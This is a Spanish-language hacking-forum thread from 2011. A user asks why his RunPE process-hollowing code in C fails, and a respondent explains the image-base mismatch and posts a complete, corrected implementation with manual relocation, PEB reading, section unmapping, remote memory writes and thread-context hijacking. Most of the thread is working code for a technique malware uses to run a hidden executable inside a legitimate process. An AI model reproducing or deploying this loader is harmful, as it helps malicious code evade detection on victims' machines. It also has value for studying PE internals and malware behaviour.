elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  ERROR - Process Hollowing
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ERROR - Process Hollowing  (Leído 2,409 veces)
ThunderCls


Desconectado Desconectado

Mensajes: 455


Coder | Reverser | Gamer


Ver Perfil WWW
ERROR - Process Hollowing
« en: 11 Agosto 2011, 01:35 am »

Hola gente
Veran, he estado practicando un poco con el formato PE, la cuestion es que he querido usar un codigo para dichos fines pero no logro que me funcione.
El codigo que estoy estudiando es uno usado para correr un ejecutable en el contexto de otro, lo que comunmente la mayoria conoce como RunPE  :P , el codigo compila sin problemas, el problema se da a la hora de resumir el hilo para continuar la ejecucion, por lo que sospecho que hay algun fallo cuando el exe2 se copia en la memoria del exe1, pero no se a ciencia cierta cual podria ser el fallo, pues cuando intento ejecutar, por ej, el bloc de notas en la calculadora lo hace sin problemas, el fallo lo da cuando intento con otra app. El codigo es el siguiente:

Código
  1. typedef DWORD (__stdcall *pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  2. void RunPE(LPSTR, LPSTR);
  3.  
  4. typedef struct {
  5.   PIMAGE_DOS_HEADER dos_header;
  6.   PIMAGE_NT_HEADERS nt_headers;
  7.   PIMAGE_SECTION_HEADER section_header;
  8.   LPBYTE file_data;
  9. } NEW_PROCESS_INFO, *PNEW_PROCESS_INFO;
  10.  
  11. void get_replacement_info(const char* full_file_path, PNEW_PROCESS_INFO new_process_info)
  12. {
  13.   DWORD bytes_read;
  14.  
  15.   HANDLE hFile = CreateFileA(full_file_path,
  16.                              GENERIC_READ,
  17.                              FILE_SHARE_READ,
  18.                              NULL,
  19.                              OPEN_EXISTING,
  20.                              FILE_ATTRIBUTE_NORMAL,
  21.                              NULL);
  22.   //Note: High DWORD ignored, dangerous with >4GB files :-P
  23.   DWORD file_size = GetFileSize(hFile, NULL);
  24.  
  25.   new_process_info->file_data = (LPBYTE)malloc(file_size * sizeof(LPBYTE));
  26.   ReadFile(hFile, new_process_info->file_data, file_size, &bytes_read, 0);
  27.  
  28.   assert(bytes_read == file_size);
  29.   new_process_info->dos_header = (PIMAGE_DOS_HEADER)(&new_process_info->file_data[0]);
  30.   new_process_info->nt_headers = (PIMAGE_NT_HEADERS)(&new_process_info->file_data[new_process_info->dos_header->e_lfanew]);
  31. }
  32.  
  33. void RunPE(LPSTR file, LPSTR host)
  34. {
  35.   NEW_PROCESS_INFO new_process_info;
  36.   PROCESS_INFORMATION process_info;
  37.   STARTUPINFOA startup_info;
  38.  
  39.   RtlZeroMemory(&startup_info, sizeof(STARTUPINFOA));
  40.   pNtUnmapViewOfSection NtUnmapViewOfSection = NULL;
  41.  
  42.   CreateProcessA(NULL,
  43.                  host,
  44.                  NULL,
  45.                  NULL,
  46.                  FALSE,
  47.                  CREATE_SUSPENDED,
  48.                  NULL,
  49.                  NULL,
  50.                  &startup_info,
  51.                  &process_info);
  52.  
  53.   get_replacement_info(file, &new_process_info);
  54.   NtUnmapViewOfSection = (pNtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll.dll"),
  55.                                                                                  "NtUnmapViewOfSection"));
  56.   //Remove target memory code
  57.   NtUnmapViewOfSection(process_info.hProcess, (PVOID)new_process_info.nt_headers->OptionalHeader.ImageBase);
  58.   //Allocate memory in target process starting at replacements image base
  59.   VirtualAllocEx(process_info.hProcess,
  60.                  (PVOID)new_process_info.nt_headers->OptionalHeader.ImageBase,
  61.                  new_process_info.nt_headers->OptionalHeader.SizeOfImage,
  62.                  MEM_COMMIT | MEM_RESERVE,
  63.                  PAGE_EXECUTE_READWRITE);
  64.  
  65.   //Copy in PE header of replacement process
  66.   WriteProcessMemory(process_info.hProcess,
  67.                      (PVOID)new_process_info.nt_headers->OptionalHeader.ImageBase,
  68.                      &new_process_info.file_data[0],
  69.                      new_process_info.nt_headers->OptionalHeader.SizeOfHeaders,
  70.                      NULL);
  71.  
  72.   //Write in all sections of the replacement process
  73.   for(int i = 0; i < new_process_info.nt_headers->FileHeader.NumberOfSections; i++)
  74.   {
  75.      //Get offset of section
  76.      int section_offset = new_process_info.dos_header->e_lfanew +
  77.                           sizeof(IMAGE_NT_HEADERS) +
  78.                           (sizeof(IMAGE_SECTION_HEADER) * i);
  79.      new_process_info.section_header = (PIMAGE_SECTION_HEADER)(&new_process_info.file_data[section_offset]);
  80.  
  81.      //Write in section
  82.      WriteProcessMemory(process_info.hProcess,
  83.                         (LPVOID)(new_process_info.nt_headers->OptionalHeader.ImageBase +
  84.                         new_process_info.section_header->VirtualAddress),
  85.                         &new_process_info.file_data[new_process_info.section_header->PointerToRawData],
  86.                         new_process_info.section_header->SizeOfRawData,
  87.                         NULL);
  88.   }
  89.  
  90.   //Get CONTEXT of main thread of suspended process, fix up EAX to point to new entry point
  91.   LPCONTEXT thread_context = (LPCONTEXT)LocalAlloc(LPTR, sizeof(CONTEXT));
  92.   thread_context->ContextFlags = CONTEXT_FULL;
  93.   GetThreadContext(process_info.hThread, thread_context);
  94.   thread_context->Eax = new_process_info.nt_headers->OptionalHeader.ImageBase +
  95.                         new_process_info.nt_headers->OptionalHeader.AddressOfEntryPoint;
  96.   SetThreadContext(process_info.hThread, thread_context);
  97.  
  98.   //Resume the main thread, now holding the replacement processes code
  99.   ResumeThread(process_info.hThread);
  100.   free(new_process_info.file_data);
  101.   LocalFree(thread_context);
  102. }

Si alguien me pudiera dar una manito aqui se lo agradeceria. Por cierto, estoy usando el BC++
Saludos


En línea

-[ "…I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/
Eternal Idol
Kernel coder
Moderador
***
Desconectado Desconectado

Mensajes: 5.969


Israel nunca torturó niños, ni lo volverá a hacer.


Ver Perfil WWW
Re: ERROR - Process Hollowing
« Respuesta #1 en: 13 Agosto 2011, 13:30 pm »

Lo mejor que podes hacer es instalar el WinDbg y depurar.


En línea

La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón
Karman


Desconectado Desconectado

Mensajes: 673



Ver Perfil WWW
Re: ERROR - Process Hollowing
« Respuesta #2 en: 16 Agosto 2011, 20:28 pm »

el problema se da a la hora de resumir el hilo para continuar la ejecucion, por lo que sospecho que hay algun fallo cuando el exe2 se copia en la memoria del exe1, pero no se a ciencia cierta cual podria ser el fallo, pues cuando intento ejecutar, por ej, el bloc de notas en la calculadora lo hace sin problemas, el fallo lo da cuando intento con otra app.

para "ese código" tenes que asegurarte que ambos ejecutables tengan la misma imagebase, dado que el código no comprueba la imagebase del ejecutable original, en caso de no ser iguales tendrías que asegurarte que el segundo ejecutable tenga el directorio reloc's y realizar el relocado manual... acá tenes un ejemplo de como hacerlo:

Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3.  
  4. typedef ULONG (WINAPI *tNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  5. typedef ULONG (WINAPI *tNtQueryInformationProcess)(HANDLE ProcessHandle,DWORD ProcessInformationClass,
  6. PVOID ProcessInformation,ULONG ProcessInformationLength,PULONG ReturnLength);
  7.  
  8. typedef struct{
  9.   PIMAGE_DOS_HEADER dos_header;
  10.   PIMAGE_NT_HEADERS nt_headers;
  11.   PIMAGE_SECTION_HEADER section_header;
  12.   LPBYTE file_data;
  13. }NEW_PROCESS_INFO, *PNEW_PROCESS_INFO;
  14.  
  15. typedef struct _PEB {
  16.  BYTE   Reserved1[2];
  17.  BYTE   BeingDebugged;
  18.  BYTE   Reserved2[1];
  19.  PVOID  Reserved3[1];
  20.  PVOID  ImageBaseAddress;
  21.  PVOID  Ldr;
  22.  PVOID  ProcessParameters;
  23.  BYTE   Reserved4[104];
  24.  PVOID  Reserved5[52];
  25.  PVOID  PostProcessInitRoutine;
  26.  BYTE   Reserved6[128];
  27.  PVOID  Reserved7[1];
  28.  ULONG  SessionId;
  29. } PEB, *PPEB;
  30.  
  31. typedef struct _PROCESS_BASIC_INFORMATION {
  32.  PVOID Reserved1;
  33.  PPEB PebBaseAddress;
  34.  PVOID Reserved2[2];
  35.  ULONG_PTR UniqueProcessId;
  36.  PVOID Reserved3;
  37. } PROCESS_BASIC_INFORMATION;
  38.  
  39. BOOL get_replacement_info(const char* full_file_path, PNEW_PROCESS_INFO new_process_info){
  40.  DWORD bytes_read;
  41.  HANDLE hFile=CreateFileA(full_file_path,GENERIC_READ,FILE_SHARE_READ,NULL,
  42.    OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  43.  if(hFile==INVALID_HANDLE_VALUE)
  44.  return FALSE;
  45.  DWORD file_size=GetFileSize(hFile,NULL);
  46.  new_process_info->file_data=(LPBYTE)malloc(file_size*sizeof(LPBYTE));
  47.  if(ReadFile(hFile,new_process_info->file_data,file_size,&bytes_read,0)){
  48.    new_process_info->dos_header = (PIMAGE_DOS_HEADER)(&new_process_info->file_data[0]);
  49.    new_process_info->nt_headers = (PIMAGE_NT_HEADERS)(&new_process_info->file_data[new_process_info->dos_header->e_lfanew]);
  50.    return TRUE;
  51.  }
  52.  free(new_process_info->file_data);
  53.  CloseHandle(hFile);
  54.  return FALSE;
  55. }
  56.  
  57. BOOL RunPE(LPSTR file, LPSTR host){
  58.  NEW_PROCESS_INFO new_process_info;
  59.  HMODULE hNtdll=GetModuleHandleA("ntdll.dll");
  60.  tNtUnmapViewOfSection NtUnmapViewOfSection=(tNtUnmapViewOfSection)
  61.  (GetProcAddress(hNtdll,"NtUnmapViewOfSection"));
  62.  tNtQueryInformationProcess NtQueryInformationProcess=(tNtQueryInformationProcess)
  63.  (GetProcAddress(hNtdll,"NtQueryInformationProcess"));
  64.  if(!NtUnmapViewOfSection||!NtQueryInformationProcess)
  65.    return FALSE;
  66.  if(get_replacement_info(file,&new_process_info)){
  67.    PROCESS_INFORMATION process_info;STARTUPINFOA startup_info;
  68.    RtlZeroMemory(&startup_info,sizeof(STARTUPINFOA));
  69.    if(CreateProcessA(NULL,host,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&startup_info,&process_info)){
  70.      //Get client base address
  71.      PEB Peb;PROCESS_BASIC_INFORMATION pbi;/*ProcessBasicInformation*/
  72.      NtQueryInformationProcess(process_info.hProcess,0,&pbi,sizeof(pbi),NULL);
  73.      ReadProcessMemory(process_info.hProcess,(LPCVOID)pbi.PebBaseAddress,&Peb,sizeof(Peb),NULL);
  74.      //Reloc new process
  75.      if(new_process_info.nt_headers->OptionalHeader.ImageBase!=(DWORD)Peb.ImageBaseAddress){
  76.        DWORD Delta=((DWORD)Peb.ImageBaseAddress-new_process_info.nt_headers->OptionalHeader.ImageBase);
  77.        if(new_process_info.nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress){
  78.          PIMAGE_BASE_RELOCATION pIBR=NULL;
  79.          DWORD pRVAIBR=(DWORD)new_process_info.nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
  80.          for(int i=0;i<new_process_info.nt_headers->FileHeader.NumberOfSections;i++){
  81.            PIMAGE_SECTION_HEADER pimage_section_header=(PIMAGE_SECTION_HEADER)(
  82.              (LPBYTE)&new_process_info.nt_headers->OptionalHeader+new_process_info.nt_headers->FileHeader.SizeOfOptionalHeader+
  83.              (i*sizeof(IMAGE_SECTION_HEADER))
  84.            );
  85.            if((pRVAIBR>=pimage_section_header->VirtualAddress)&&(pRVAIBR<=(pimage_section_header->VirtualAddress+pimage_section_header->SizeOfRawData))){
  86.              PIMAGE_SECTION_HEADER section=(PIMAGE_SECTION_HEADER)pimage_section_header;
  87.              pIBR=(PIMAGE_BASE_RELOCATION)(pRVAIBR+section->PointerToRawData-section->VirtualAddress+new_process_info.file_data);
  88.              break;
  89.            }
  90.          }
  91.          PBYTE dest=NULL;
  92.          for(;pIBR->VirtualAddress>0;){
  93.            DWORD pRVAIBR=(DWORD)pIBR->VirtualAddress;
  94.            for(int i=0;i<new_process_info.nt_headers->FileHeader.NumberOfSections;i++){
  95.              PIMAGE_SECTION_HEADER pimage_section_header=(PIMAGE_SECTION_HEADER)(
  96.                (LPBYTE)&new_process_info.nt_headers->OptionalHeader+new_process_info.nt_headers->FileHeader.SizeOfOptionalHeader+
  97.                (i*sizeof(IMAGE_SECTION_HEADER))
  98.              );
  99.              if((pRVAIBR>=pimage_section_header->VirtualAddress)&&(pRVAIBR<=(pimage_section_header->VirtualAddress+pimage_section_header->SizeOfRawData))){
  100.                PIMAGE_SECTION_HEADER section=(PIMAGE_SECTION_HEADER)pimage_section_header;
  101.                dest=(PBYTE)(pRVAIBR+section->PointerToRawData-section->VirtualAddress+new_process_info.file_data);
  102.                break;
  103.              }
  104.            }
  105.            if(dest){
  106.              PWORD relInfo=(PWORD)((PBYTE)pIBR+IMAGE_SIZEOF_BASE_RELOCATION);
  107.              for(DWORD i=0;i<((pIBR->SizeOfBlock-IMAGE_SIZEOF_BASE_RELOCATION)/2);i++,relInfo++){
  108.                if((*relInfo>>12)==IMAGE_REL_BASED_HIGHLOW){
  109.                  PDWORD pAddress=(LPDWORD)(dest+(*relInfo&0xfff));
  110.                  *pAddress+=Delta;
  111.                }
  112.              }
  113.            }
  114.            pIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)pIBR)+pIBR->SizeOfBlock);
  115.          }
  116.        }else{
  117.          puts("no reloc table");
  118.          TerminateProcess(process_info.hProcess,0);
  119.          return FALSE;
  120.        }
  121.        new_process_info.nt_headers->OptionalHeader.ImageBase=(DWORD)Peb.ImageBaseAddress;
  122.      }
  123.      //Remove target memory code
  124.      NtUnmapViewOfSection(process_info.hProcess,(PVOID)new_process_info.nt_headers->OptionalHeader.ImageBase);
  125.      //Allocate memory in target process starting at replacements image base
  126.      VirtualAllocEx(process_info.hProcess,(PVOID)new_process_info.nt_headers->OptionalHeader.ImageBase,
  127.        new_process_info.nt_headers->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
  128.      //Copy in PE header of replacement process
  129.      WriteProcessMemory(process_info.hProcess,(PVOID)new_process_info.nt_headers->OptionalHeader.ImageBase,
  130.        &new_process_info.file_data[0],new_process_info.nt_headers->OptionalHeader.SizeOfHeaders,NULL);
  131.      //Write in all sections of the replacement process
  132.      for(int i=0;i<new_process_info.nt_headers->FileHeader.NumberOfSections;i++){
  133.        //Get offset of section
  134.        int section_offset=new_process_info.dos_header->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(sizeof(IMAGE_SECTION_HEADER)*i);
  135.        new_process_info.section_header=(PIMAGE_SECTION_HEADER)(&new_process_info.file_data[section_offset]);
  136.        //Write in section
  137.        WriteProcessMemory(process_info.hProcess,(LPVOID)((DWORD_PTR)new_process_info.nt_headers->OptionalHeader.ImageBase+
  138.          new_process_info.section_header->VirtualAddress),&new_process_info.file_data[new_process_info.section_header->PointerToRawData],
  139.          new_process_info.section_header->SizeOfRawData,NULL);
  140.      }
  141.      //Get CONTEXT of main thread of suspended process, fix up EAX to point to new entry point
  142.      CONTEXT thread_context;
  143.      thread_context.ContextFlags=CONTEXT_FULL;
  144.      GetThreadContext(process_info.hThread,&thread_context);
  145.      thread_context.Eax=new_process_info.nt_headers->OptionalHeader.ImageBase+new_process_info.nt_headers->OptionalHeader.AddressOfEntryPoint;
  146.      SetThreadContext(process_info.hThread,&thread_context);
  147.      //Resume the main thread, now holding the replacement processes code
  148.      ResumeThread(process_info.hThread);
  149.      free(new_process_info.file_data);
  150.      return TRUE;
  151.    }else
  152.      puts("createprocess fail!");
  153.  }else
  154.    puts("get_replacement_info fail!");
  155.  return FALSE;
  156. }
  157.  
  158. int main(void){
  159.  RunPE("C:\\WINDOWS\\explorer.exe","C:\\CodeBlocks\\Examples\\MyApp.exe");
  160.  system("pause");
  161.  return 0;
  162. }

S2
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines